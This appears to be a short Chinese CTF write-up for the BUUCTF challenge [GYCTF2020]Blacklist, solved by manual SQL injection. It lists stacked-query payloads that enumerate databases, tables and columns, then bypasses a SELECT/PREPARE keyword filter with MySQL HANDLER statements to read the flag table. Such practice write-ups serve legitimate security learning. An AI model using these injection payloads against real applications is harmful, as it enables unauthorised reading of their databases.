9.3 BUUCTF [GYCTF2020]Blacklist
手工SQL注入
?inject=1'后有报错 且发现过滤掉了 update select 等关键词
所以只能堆叠注入
?inject=1';show databases;-- -
?inject=1';show tables;-- -
注意查询columns用from的时候 后面的table名一定用 `` 括起来!
?inject=1';show columns from `FlagHere`;-- -
最后查询 flag的时候因为select被过滤了 prepare也被过滤了 所以直接选择和预编译都不能用
新姿势:
HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere COLSE;
所以构造
?inject=1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;-- -
浙公网安备 33010602011771号